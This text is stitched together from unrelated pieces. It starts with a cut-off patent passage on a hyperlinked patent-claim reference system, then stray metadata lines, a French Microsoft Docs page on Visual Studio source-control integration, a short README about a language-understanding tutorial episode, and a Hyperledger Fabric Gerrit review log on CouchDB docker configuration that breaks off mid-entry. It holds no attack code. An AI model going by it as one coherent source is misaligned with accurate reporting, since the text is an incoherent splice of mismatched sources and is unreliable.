processor also constituting machine readable media. The instructions may further be transmitted or received over a network via the network interface device using any one of a number of well known transfer protocols e.g. HTTP Session Initiation Protocol SIP . The term machine readable medium should be taken to include a single medium or multiple media e.g. a centralized or distributed database and or associated caches and servers that store the one or more sets of instructions. The term machine readable medium shall also be taken to include any medium that is capable of storing encoding or carrying a set of instructions for execution by the machine and that cause the machine to perform any of the one or more of the methodologies illustrated herein. The term machine readable medium shall accordingly be taken to include but not be limited to and solid state memories optical and magnetic medium. Method embodiments illustrated herein may be computer implemented. Some embodiments may include computer readable media encoded with a computer program e.g. software which includes instructions operable to cause an electronic device to perform methods of various embodiments. A software implementation or computer implemented method may include microcode assembly language code or a higher level language code which further may include computer readable instructions for performing various methods. The code may form portions of computer program products. Further the code may be tangibly stored on one or more volatile or non volatile computer readable media during execution or at other times. These computer readable media may include but are not limited to hard disks removable magnetic disks removable optical disks e.g. compact disks and digital video disks magnetic cassettes memory cards or sticks Random Access Memories RAMs Read Only Memories ROMs and the like. In some embodiments a computerized patent claim reference system is illustrated including a claim limitation listing showing one or more claim limitations of at least one claim of a patent and at least one hyperlink each hyperlink linking one of the claim limitations to one or more references defining the claim limitation wherein the claim limitation listing comprises one or more claims. Further the system is illustrated as having the one or more claims comprise each independent claim of the patent. Moreover the system is illustrated as possibly having the one or more claims comprise each issued claim of the patent. Additionally the system is illustrated as having at least one hyperlink comprises a mechanism to present a popup menu of a plurality of references defining the claim limitation. Furthermore the system is illustrated as having at least one hyperlink that may comprise a list of types of references defining the claim limitation. The system is further illustrated wherein the one or more references defining the claim limitation comprise at least one of extrinsic or intrinsic evidence. In addition the system is further illustrated wherein extrinsic evidence comprises one or more of one or more publications one or more other patents one or more testimony of experts a testimony of the inventor or one or more dictionary definitions. Further the system is illustrated as possibly having an intrinsic evidence list that comprises a specification of the patent one or more claims of the patent or a prosecution history of a patent. Moreover the system is illustrated as potentially having a Web server operable to present the claim limitation listing and hyperlinks to a user via a Web browser. A method of storing patent reference data including storing one or more claim limitations of at least one claim of a patent and storing at least one hyperlink each hyperlink linking one of the claim limitations to one or more references defining the claim limitation. The method of storing patent reference data may further include storing the one or more references defining the claim limitation wherein the one or more references defining the claim limitation comprise at least one of extrinsic or intrinsic evidence. Additionally the method may further include having the claim limitations and at least one hyperlink stored on a Web server system operable to present the claim limitation listing and hyperlinks to a user via a Web browser. Further the method may include presenting claim limitations of at least one claim of a patent as a hyperlink the hyperlink from the claim limitation linking to one or more references defining the claim limitation wherein the hyperlinks comprise popup menus of references defining the claim limitation. Moreover the method may include having the hyperlinks comprise references defining the claim limitations sorted by reference type wherein the one or more references defining the claim limitation comprise at least one of extrinsic and intrinsic evidence. In some embodiments a machine readable medium with instructions stored thereon is illustrated the instructions when executed operable to cause a computerized system to store one or more claim limitations associated with one or more claims of a patent and store one or more hyperlinks each hyperlink linking one of the claim limitations to one or more references associated with the claim limitation. Example embodiments may include a machine readable medium with instructions stored thereon the instructions when executed operable to cause a computerized system to present claim limitations of at least one claim of a patent as a hyperlink the hyperlink of the claim limitation linking to one or more references defining the claim limitation. In further example embodiments a method includes a first parameter and a second parameter being received the first and second parameters indicative of a first and second characteristic of a patent claim respectively. First and second parameter values for at least at least a portion of the patent claims in a set of patent claims may be accessed the first and second parameter values corresponding to the first and second parameters respectively. A chart may be presented on a display device the chart depicting relationships between the first parameter and the second parameter for at least a portion of the set of patent claims the relationships represented as one or more data points. In some example embodiment a selection of patent claims is retrieved associated with a particular drug. In further example embodiments accessing the first and second parameter values may include accessing a patent database and obtaining at least one record associated with a patent claim in the patent set. In an example embodiment the method further includes the selection of a first data point is detected the first data point included in the one or more data points. Visualization options may be presented on the display device the visualization options including highlighting all related data points presenting claim language associated with the first data point and presenting all parameter values associated with the first data point. A visualization preference may be received and the chart may be modified on the display device using the visualization preference. In another example embodiment a patent claim is accessed. A plurality of parameters indicative of the patent claim may be presented on a display device the plurality of parameters including claim breadth claim type and claim category. An enumerated parameter value for a first parameter may be accessed the first parameter selected from the plurality of parameters. An association between the patent claim and the enumerated parameter may be stored wherein the association is stored in a patent claim entry in a patent claim database. It is to be understood that the above description is intended to be illustrative and not restrictive. For example the above illustrated embodiments and or aspects thereof may be used in combination with each other. Many other embodiments may be apparent to those of skill in the art upon reviewing the above description. The scope of the invention should therefore be determined with reference to the appended claims along with the full scope of equivalents to which such claims are entitled. In the appended claims the terms including and in which are used as the plain English equivalents of the respective terms comprising and wherein. Also in the following claims the terms including and comprising are open ended that is a system device article or process that includes elements in addition to those listed after such a term in a claim are still deemed to fall within the scope of that claim. Moreover in the following claims the terms first second and third etc. are used merely as labels and are not intended to impose numerical requirements on their objects.
389.742268
1,939
0.825142
eng_Latn
0.999949
bb2aabb2923d66c977b7985e7c8cf220fc530055
5,076
md
Markdown
docs/extensibility/internals/source-control-integration-essentials.md
ManuSquall/visualstudio-docs.fr-fr
87f0072eb292673de4a102be704162619838365f
[ "CC-BY-4.0", "MIT" ]
1
2021-08-15T11:25:55.000Z
2021-08-15T11:25:55.000Z
docs/extensibility/internals/source-control-integration-essentials.md
ManuSquall/visualstudio-docs.fr-fr
87f0072eb292673de4a102be704162619838365f
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/extensibility/internals/source-control-integration-essentials.md
ManuSquall/visualstudio-docs.fr-fr
87f0072eb292673de4a102be704162619838365f
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: Notions fondamentales de l’intégration du contrôle de code source | Microsoft Docs description: 'Découvrez les deux types d’intégration de contrôle de code source pris en charge par Visual Studio : un plug-in de contrôle de code source et une solution de contrôle de code source VSPackage.' ms.custom: SEO-VS-2020 ms.date: 11/04/2016 ms.topic: conceptual helpviewer_keywords: - Source Control Integration, essentials - Source Control Integration,overview - essentials, Source Control Integration ms.assetid: 442057cb-fd54-4283-96f8-2f6dc8bf2de7 author: leslierichardson95 ms.author: lerich manager: jmartens ms.workload: - vssdk ms.openlocfilehash: 155e662eae0dda6689a233e31fd62bb72259ae8b ms.sourcegitcommit: f2916d8fd296b92cc402597d1d1eecda4f6cccbf ms.translationtype: MT ms.contentlocale: fr-FR ms.lasthandoff: 03/25/2021 ms.locfileid: "105069333" --- # <a name="source-control-integration-essentials"></a>Éléments fondamentaux de l’intégration du contrôle de code source [!INCLUDE[vsprvs](../../code-quality/includes/vsprvs_md.md)] prend en charge deux types d’intégration du contrôle de code source : un plug-in de contrôle de code source qui fournit des fonctionnalités de base et est généré à l’aide de l’API de plug-in de contrôle de code source (anciennement appelée API MSSCCI) et une solution d’intégration de contrôle de code source basée sur VSPackage qui fournit des fonctionnalités plus robustes. ## <a name="source-control-plug-in"></a>Plug-in de contrôle de code source Un plug-in de contrôle de code source est écrit sous la forme d’une DLL qui implémente l’API de plug-in de contrôle de code source. L’inscription et la fonctionnalité d’intégration du contrôle de code source sont fournies par le biais de l’API. Cette approche est plus facile à implémenter qu’un VSPackage de contrôle de code source et utilise l' [!INCLUDE[vsprvs](../../code-quality/includes/vsprvs_md.md)] interface utilisateur pour la plupart des opérations de contrôle de code source. Pour implémenter un plug-in de contrôle de code source à l’aide de l’API de plug-in de contrôle de code source, procédez comme suit : 1. Créez une DLL qui implémente les fonctions spécifiées dans les [plug-ins de contrôle de code source](../../extensibility/source-control-plug-ins.md). 2. Inscrivez la DLL en effectuant les entrées de Registre appropriées, comme décrit dans [Comment : installer un plug-in de contrôle de code source](../../extensibility/internals/how-to-install-a-source-control-plug-in.md). 3. Créez une interface utilisateur d’assistance et affichez-la lorsque vous y êtes invité par le package de l’adaptateur de contrôle de code source (le [!INCLUDE[vsprvs](../../code-quality/includes/vsprvs_md.md)] composant qui gère les fonctionnalités de contrôle de code source via les plug-ins de contrôle de code source). Pour plus d’informations, consultez [création d’un plug-in de contrôle de code source](../../extensibility/internals/creating-a-source-control-plug-in.md). ## <a name="source-control-vspackage"></a>VSPackage de contrôle de code source Une implémentation du VSPackage de contrôle de code source vous permet de développer un remplacement personnalisé pour l' [!INCLUDE[vsprvs](../../code-quality/includes/vsprvs_md.md)] interface utilisateur du contrôle de code source. Cette approche fournit un contrôle complet sur l’intégration du contrôle de code source, mais elle vous oblige à fournir les éléments d’interface utilisateur et à implémenter les interfaces de contrôle de code source qui seraient autrement fournies sous l’approche de plug-in. Pour implémenter un VSPackage de contrôle de code source, vous devez : 1. Créez et inscrivez votre propre VSPackage de contrôle de code source, comme décrit dans [inscription et sélection](../../extensibility/internals/registration-and-selection-source-control-vspackage.md). 2. Remplacez l’interface utilisateur du contrôle de code source par défaut par votre interface utilisateur personnalisée. Voir [interface utilisateur personnalisée](../../extensibility/internals/custom-user-interface-source-control-vspackage.md). 3. Spécifiez les glyphes à utiliser et gérez les événements de **Explorateur de solutions** glyphe. Consultez [contrôle Glyph](../../extensibility/internals/glyph-control-source-control-vspackage.md). 4. Gérez les événements de modification de requête et d’enregistrement des requêtes, comme indiqué dans [requête modifier la requête enregistrer](../../extensibility/internals/query-edit-query-save-source-control-vspackage.md). Pour plus d’informations, consultez [création d’un VSPackage de contrôle de code source](../../extensibility/internals/creating-a-source-control-vspackage.md). ## <a name="see-also"></a>Voir aussi - [Vue d’ensemble](../../extensibility/internals/source-control-integration-overview.md) - [Création d’un plug-in de contrôle de code source](../../extensibility/internals/creating-a-source-control-plug-in.md) - [Création d’un VSPackage de contrôle de code source](../../extensibility/internals/creating-a-source-control-vspackage.md)
86.033898
510
0.792947
fra_Latn
0.959152
bb2b00a86539e1e317f6af7c0c3995d8afeb8289
328
md
Markdown
episode-6/README.md
chughts/python-primer-companion-code
3a147616183932d52714373b68054c212a040dc9
[ "Apache-2.0" ]
18
2016-03-30T14:55:28.000Z
2019-01-01T12:41:27.000Z
episode-6/README.md
chughts/python-primer-companion-code
3a147616183932d52714373b68054c212a040dc9
[ "Apache-2.0" ]
5
2016-02-22T20:12:33.000Z
2018-11-19T15:33:46.000Z
episode-6/README.md
chughts/python-primer-companion-code
3a147616183932d52714373b68054c212a040dc9
[ "Apache-2.0" ]
21
2016-02-22T19:22:59.000Z
2020-12-02T14:46:36.000Z
# Episode 6 : Natural Language Keywords and Entities In this episode you learn how to use the Natural Language Understanding service to determine the primary keywords and entities extending your applications understanding of the submitted text. **Note:** This section used to use the now deprecated Alchemy Language service.
54.666667
136
0.814024
eng_Latn
0.999283
bb2b301359bccfe08eb6c0737005f4f30051dba1
48,869
md
Markdown
fabric/6857-7201/7099.md
hyperledger-gerrit-archive/fabric-gerrit
188c6e69ccb2e4c4d609ae749a467fa7e289b262
[ "Apache-2.0" ]
2
2021-01-08T04:06:04.000Z
2021-02-09T08:28:54.000Z
fabric/6857-7201/7099.md
cendhu/fabric-gerrit
188c6e69ccb2e4c4d609ae749a467fa7e289b262
[ "Apache-2.0" ]
null
null
null
fabric/6857-7201/7099.md
cendhu/fabric-gerrit
188c6e69ccb2e4c4d609ae749a467fa7e289b262
[ "Apache-2.0" ]
4
2019-12-07T05:54:26.000Z
2020-06-04T02:29:43.000Z
<strong>Project</strong>: fabric<br><strong>Branch</strong>: master<br><strong>ID</strong>: 7099<br><strong>Subject</strong>: [FAB-2662] Implement CouchDB docker config<br><strong>Status</strong>: MERGED<br><strong>Owner</strong>: Adnan C - [email protected]<br><strong>Assignee</strong>:<br><strong>Created</strong>: 3/9/2017, 9:30:20 PM<br><strong>LastUpdated</strong>: 4/20/2017, 1:39:27 PM<br><strong>CommitMessage</strong>:<br><pre>[FAB-2662] Implement CouchDB docker config https://jira.hyperledger.org/browse/FAB-2662 Changing the CouchDB dockers used in fabric to use recommended configuration (couchdb local.ini). Include config comments in local.ini stating how to enable user security. Also, making sure that all CouchDB unit-tests follow the same procedure for setting up address and login credentials. Including test comments stating how to run tests against CouchDB with user security enabled. Change-Id: I975d04d757d0371c8db03acf0ddcf92c01c35f8c Signed-off-by: Adnan Choudhury <[email protected]> Signed-off-by: denyeart <[email protected]> </pre><h1>Comments</h1><strong>Reviewer</strong>: Adnan C - [email protected]<br><strong>Reviewed</strong>: 3/9/2017, 9:30:20 PM<br><strong>Message</strong>: <pre>Uploaded patch set 1.</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/9/2017, 9:31:51 PM<br><strong>Message</strong>: <pre>Patch Set 1: Build Started https://jenkins.hyperledger.org/job/fabric-verify-x86_64/8503/ (1/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/9/2017, 9:32:52 PM<br><strong>Message</strong>: <pre>Patch Set 1: Build Started https://jenkins.hyperledger.org/job/fabric-verify-behave-x86_64/2577/ (2/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/9/2017, 9:36:07 PM<br><strong>Message</strong>: <pre>Patch Set 1: Build Started https://jenkins.hyperledger.org/job/fabric-verify-end-2-end-x86_64/43/ (3/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/9/2017, 10:51:08 PM<br><strong>Message</strong>: <pre>Patch Set 1: Verified+1 Build Successful https://jenkins.hyperledger.org/job/fabric-verify-behave-x86_64/2577/ : FAILURE (skipped) https://jenkins.hyperledger.org/job/fabric-verify-x86_64/8503/ : SUCCESS https://jenkins.hyperledger.org/job/fabric-verify-end-2-end-x86_64/43/ : SUCCESS</pre><strong>Reviewer</strong>: David Enyeart - [email protected]<br><strong>Reviewed</strong>: 3/10/2017, 12:32:09 AM<br><strong>Message</strong>: <pre>Patch Set 1: Code-Review+1</pre><strong>Reviewer</strong>: Jason Yellick - [email protected]<br><strong>Reviewed</strong>: 3/14/2017, 8:31:13 PM<br><strong>Message</strong>: <pre>Patch Set 1: (2 comments)</pre><strong>Reviewer</strong>: David Enyeart - [email protected]<br><strong>Reviewed</strong>: 3/15/2017, 12:02:44 AM<br><strong>Message</strong>: <pre>Patch Set 1: (2 comments)</pre><strong>Reviewer</strong>: David Enyeart - [email protected]<br><strong>Reviewed</strong>: 3/15/2017, 10:57:13 AM<br><strong>Message</strong>: <pre>Patch Set 1: This one can wait until post-alpha.</pre><strong>Reviewer</strong>: Gari Singh - [email protected]<br><strong>Reviewed</strong>: 3/17/2017, 3:25:44 PM<br><strong>Message</strong>: <pre>Patch Set 1: Code-Review-1 (1 comment) just until response to my question. I read the JIRA but still not exactly sure what we are trying to accomplish here</pre><strong>Reviewer</strong>: David Enyeart - [email protected]<br><strong>Reviewed</strong>: 3/17/2017, 4:12:00 PM<br><strong>Message</strong>: <pre>Patch Set 1: -Code-Review Gari, I have updated https://jira.hyperledger.org/browse/FAB-2662 to clarify intent of this changeset. This work item simply sets the foundation for user security by introducing the local.ini default configuration. We may decide to enable user security in the default configuration in a later work item. We will likely keep the id/pw separate from the url, unless there is a compelling reason to change. Adnan will look into using viper settings to get id/pw consistently throughout the code and unit tests. Is there a best practice in terms of disabling vs enabling id/pw security as the default in a docker image? And a best practice for protecting this information?</pre><strong>Reviewer</strong>: David Enyeart - [email protected]<br><strong>Reviewed</strong>: 3/17/2017, 4:20:31 PM<br><strong>Message</strong>: <pre>Patch Set 1: (1 comment)</pre><strong>Reviewer</strong>: Adnan C - [email protected]<br><strong>Reviewed</strong>: 3/21/2017, 2:25:35 PM<br><strong>Message</strong>: <pre>Uploaded patch set 2.</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/21/2017, 2:27:08 PM<br><strong>Message</strong>: <pre>Patch Set 2: Build Started https://jenkins.hyperledger.org/job/fabric-verify-x86_64/8777/ (1/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/21/2017, 2:28:00 PM<br><strong>Message</strong>: <pre>Patch Set 2: Build Started https://jenkins.hyperledger.org/job/fabric-verify-behave-x86_64/2851/ (2/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/21/2017, 2:31:26 PM<br><strong>Message</strong>: <pre>Patch Set 2: Build Started https://jenkins.hyperledger.org/job/fabric-verify-end-2-end-x86_64/317/ (3/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/21/2017, 3:16:41 PM<br><strong>Message</strong>: <pre>Patch Set 2: Verified-1 Build Failed https://jenkins.hyperledger.org/job/fabric-verify-x86_64/8777/ : FAILURE https://jenkins.hyperledger.org/job/fabric-verify-behave-x86_64/2851/ : FAILURE (skipped) https://jenkins.hyperledger.org/job/fabric-verify-end-2-end-x86_64/317/ : FAILURE (skipped)</pre><strong>Reviewer</strong>: Adnan C - [email protected]<br><strong>Reviewed</strong>: 3/21/2017, 4:11:52 PM<br><strong>Message</strong>: <pre>Uploaded patch set 3.</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/21/2017, 4:13:06 PM<br><strong>Message</strong>: <pre>Patch Set 3: Build Started https://jenkins.hyperledger.org/job/fabric-verify-x86_64/8779/ (1/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/21/2017, 4:13:52 PM<br><strong>Message</strong>: <pre>Patch Set 3: Build Started https://jenkins.hyperledger.org/job/fabric-verify-behave-x86_64/2853/ (2/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/21/2017, 4:15:56 PM<br><strong>Message</strong>: <pre>Patch Set 3: Build Started https://jenkins.hyperledger.org/job/fabric-verify-end-2-end-x86_64/319/ (3/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/21/2017, 4:58:46 PM<br><strong>Message</strong>: <pre>Patch Set 3: Verified-1 Build Failed https://jenkins.hyperledger.org/job/fabric-verify-x86_64/8779/ : FAILURE https://jenkins.hyperledger.org/job/fabric-verify-behave-x86_64/2853/ : FAILURE (skipped) https://jenkins.hyperledger.org/job/fabric-verify-end-2-end-x86_64/319/ : FAILURE (skipped)</pre><strong>Reviewer</strong>: Adnan C - [email protected]<br><strong>Reviewed</strong>: 3/21/2017, 5:51:41 PM<br><strong>Message</strong>: <pre>Uploaded patch set 4.</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/21/2017, 5:52:49 PM<br><strong>Message</strong>: <pre>Patch Set 4: Build Started https://jenkins.hyperledger.org/job/fabric-verify-x86_64/8780/ (1/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/21/2017, 5:53:39 PM<br><strong>Message</strong>: <pre>Patch Set 4: Build Started https://jenkins.hyperledger.org/job/fabric-verify-behave-x86_64/2854/ (2/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/21/2017, 5:55:45 PM<br><strong>Message</strong>: <pre>Patch Set 4: Build Started https://jenkins.hyperledger.org/job/fabric-verify-end-2-end-x86_64/320/ (3/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/21/2017, 7:15:59 PM<br><strong>Message</strong>: <pre>Patch Set 4: Verified+1 Build Successful https://jenkins.hyperledger.org/job/fabric-verify-behave-x86_64/2854/ : FAILURE (skipped) https://jenkins.hyperledger.org/job/fabric-verify-end-2-end-x86_64/320/ : FAILURE (skipped) https://jenkins.hyperledger.org/job/fabric-verify-x86_64/8780/ : SUCCESS</pre><strong>Reviewer</strong>: Adnan C - [email protected]<br><strong>Reviewed</strong>: 3/23/2017, 10:58:25 AM<br><strong>Message</strong>: <pre>Uploaded patch set 5.</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/23/2017, 11:00:13 AM<br><strong>Message</strong>: <pre>Patch Set 5: Build Started https://jenkins.hyperledger.org/job/fabric-verify-x86_64/8826/ (1/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/23/2017, 11:01:16 AM<br><strong>Message</strong>: <pre>Patch Set 5: Build Started https://jenkins.hyperledger.org/job/fabric-verify-behave-x86_64/2900/ (2/3)</pre><strong>Reviewer</strong>: Adnan C - [email protected]<br><strong>Reviewed</strong>: 3/23/2017, 11:01:42 AM<br><strong>Message</strong>: <pre>Uploaded patch set 6.</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/23/2017, 11:01:59 AM<br><strong>Message</strong>: <pre>Patch Set 5: Build Started https://jenkins.hyperledger.org/job/fabric-verify-end-2-end-x86_64/366/ (3/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/23/2017, 11:03:02 AM<br><strong>Message</strong>: <pre>Patch Set 6: Build Started https://jenkins.hyperledger.org/job/fabric-verify-x86_64/8827/ (1/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/23/2017, 11:03:06 AM<br><strong>Message</strong>: <pre>Patch Set 6: Build Started https://jenkins.hyperledger.org/job/fabric-verify-behave-x86_64/2901/ (2/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/23/2017, 11:07:55 AM<br><strong>Message</strong>: <pre>Patch Set 6: Build Started https://jenkins.hyperledger.org/job/fabric-verify-end-2-end-x86_64/367/ (3/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/23/2017, 12:09:16 PM<br><strong>Message</strong>: <pre>Patch Set 5: Verified+1 Build Successful https://jenkins.hyperledger.org/job/fabric-verify-behave-x86_64/2900/ : FAILURE (skipped) https://jenkins.hyperledger.org/job/fabric-verify-end-2-end-x86_64/366/ : FAILURE (skipped) https://jenkins.hyperledger.org/job/fabric-verify-x86_64/8826/ : SUCCESS</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/23/2017, 12:13:48 PM<br><strong>Message</strong>: <pre>Patch Set 6: Verified+1 Build Successful https://jenkins.hyperledger.org/job/fabric-verify-behave-x86_64/2901/ : FAILURE (skipped) https://jenkins.hyperledger.org/job/fabric-verify-end-2-end-x86_64/367/ : FAILURE (skipped) https://jenkins.hyperledger.org/job/fabric-verify-x86_64/8827/ : SUCCESS</pre><strong>Reviewer</strong>: David Enyeart - [email protected]<br><strong>Reviewed</strong>: 3/23/2017, 1:05:47 PM<br><strong>Message</strong>: <pre>Patch Set 6: (3 comments)</pre><strong>Reviewer</strong>: Adnan C - [email protected]<br><strong>Reviewed</strong>: 3/23/2017, 2:41:39 PM<br><strong>Message</strong>: <pre>Uploaded patch set 7.</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/23/2017, 2:42:58 PM<br><strong>Message</strong>: <pre>Patch Set 7: Build Started https://jenkins.hyperledger.org/job/fabric-verify-x86_64/8837/ (1/3)</pre><strong>Reviewer</strong>: Adnan C - [email protected]<br><strong>Reviewed</strong>: 3/23/2017, 2:43:03 PM<br><strong>Message</strong>: <pre>Patch Set 7: (3 comments)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/23/2017, 2:43:35 PM<br><strong>Message</strong>: <pre>Patch Set 7: Build Started https://jenkins.hyperledger.org/job/fabric-verify-behave-x86_64/2911/ (2/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/23/2017, 2:45:59 PM<br><strong>Message</strong>: <pre>Patch Set 7: Build Started https://jenkins.hyperledger.org/job/fabric-verify-end-2-end-x86_64/377/ (3/3)</pre><strong>Reviewer</strong>: David Enyeart - [email protected]<br><strong>Reviewed</strong>: 3/23/2017, 3:20:30 PM<br><strong>Message</strong>: <pre>Patch Set 7: Code-Review+1</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/23/2017, 3:34:36 PM<br><strong>Message</strong>: <pre>Patch Set 7: Verified+1 Build Successful https://jenkins.hyperledger.org/job/fabric-verify-behave-x86_64/2911/ : FAILURE (skipped) https://jenkins.hyperledger.org/job/fabric-verify-end-2-end-x86_64/377/ : FAILURE (skipped) https://jenkins.hyperledger.org/job/fabric-verify-x86_64/8837/ : SUCCESS</pre><strong>Reviewer</strong>: Baohua Yang - [email protected]<br><strong>Reviewed</strong>: 3/23/2017, 9:54:02 PM<br><strong>Message</strong>: <pre>Patch Set 7: (1 comment) otherwise, LGTM.</pre><strong>Reviewer</strong>: Adnan C - [email protected]<br><strong>Reviewed</strong>: 3/29/2017, 11:28:37 AM<br><strong>Message</strong>: <pre>Uploaded patch set 8.</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/29/2017, 11:31:33 AM<br><strong>Message</strong>: <pre>Patch Set 8: Build Started https://jenkins.hyperledger.org/job/fabric-verify-x86_64/8982/ (1/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/29/2017, 11:31:36 AM<br><strong>Message</strong>: <pre>Patch Set 8: Build Started https://jenkins.hyperledger.org/job/fabric-verify-end-2-end-x86_64/520/ (2/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/29/2017, 11:31:54 AM<br><strong>Message</strong>: <pre>Patch Set 8: Build Started https://jenkins.hyperledger.org/job/fabric-verify-behave-x86_64/3053/ (3/3)</pre><strong>Reviewer</strong>: Adnan C - [email protected]<br><strong>Reviewed</strong>: 3/29/2017, 11:54:29 AM<br><strong>Message</strong>: <pre>Patch Set 7: (1 comment)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/29/2017, 12:36:57 PM<br><strong>Message</strong>: <pre>Patch Set 8: Verified-1 Build Failed https://jenkins.hyperledger.org/job/fabric-verify-x86_64/8982/ : FAILURE https://jenkins.hyperledger.org/job/fabric-verify-end-2-end-x86_64/520/ : SUCCESS https://jenkins.hyperledger.org/job/fabric-verify-behave-x86_64/3053/ : SUCCESS</pre><strong>Reviewer</strong>: Adnan C - [email protected]<br><strong>Reviewed</strong>: 3/29/2017, 2:13:14 PM<br><strong>Message</strong>: <pre>Patch Set 8: reverify</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/29/2017, 2:14:56 PM<br><strong>Message</strong>: <pre>Patch Set 8: -Verified Build Started https://jenkins.hyperledger.org/job/fabric-verify-x86_64/8986/ (1/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/29/2017, 2:15:36 PM<br><strong>Message</strong>: <pre>Patch Set 8: Build Started https://jenkins.hyperledger.org/job/fabric-verify-end-2-end-x86_64/524/ (2/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/29/2017, 2:16:31 PM<br><strong>Message</strong>: <pre>Patch Set 8: Build Started https://jenkins.hyperledger.org/job/fabric-verify-behave-x86_64/3057/ (3/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 3/29/2017, 3:21:32 PM<br><strong>Message</strong>: <pre>Patch Set 8: Verified+1 Build Successful https://jenkins.hyperledger.org/job/fabric-verify-x86_64/8986/ : SUCCESS https://jenkins.hyperledger.org/job/fabric-verify-end-2-end-x86_64/524/ : SUCCESS https://jenkins.hyperledger.org/job/fabric-verify-behave-x86_64/3057/ : SUCCESS</pre><strong>Reviewer</strong>: David Enyeart - [email protected]<br><strong>Reviewed</strong>: 3/30/2017, 11:25:13 AM<br><strong>Message</strong>: <pre>Patch Set 8: Code-Review+1</pre><strong>Reviewer</strong>: Adnan C - [email protected]<br><strong>Reviewed</strong>: 4/3/2017, 4:42:40 PM<br><strong>Message</strong>: <pre>Uploaded patch set 9.</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 4/3/2017, 4:44:30 PM<br><strong>Message</strong>: <pre>Patch Set 9: Build Started https://jenkins.hyperledger.org/job/fabric-verify-x86_64/9175/ (1/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 4/3/2017, 4:45:08 PM<br><strong>Message</strong>: <pre>Patch Set 9: Build Started https://jenkins.hyperledger.org/job/fabric-verify-end-2-end-x86_64/712/ (2/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 4/3/2017, 4:46:03 PM<br><strong>Message</strong>: <pre>Patch Set 9: Build Started https://jenkins.hyperledger.org/job/fabric-verify-behave-x86_64/3245/ (3/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 4/3/2017, 5:20:59 PM<br><strong>Message</strong>: <pre>Patch Set 9: Verified-1 Build Failed https://jenkins.hyperledger.org/job/fabric-verify-x86_64/9175/ : FAILURE https://jenkins.hyperledger.org/job/fabric-verify-end-2-end-x86_64/712/ : FAILURE (skipped) https://jenkins.hyperledger.org/job/fabric-verify-behave-x86_64/3245/ : SUCCESS</pre><strong>Reviewer</strong>: Adnan C - [email protected]<br><strong>Reviewed</strong>: 4/3/2017, 6:05:35 PM<br><strong>Message</strong>: <pre>Uploaded patch set 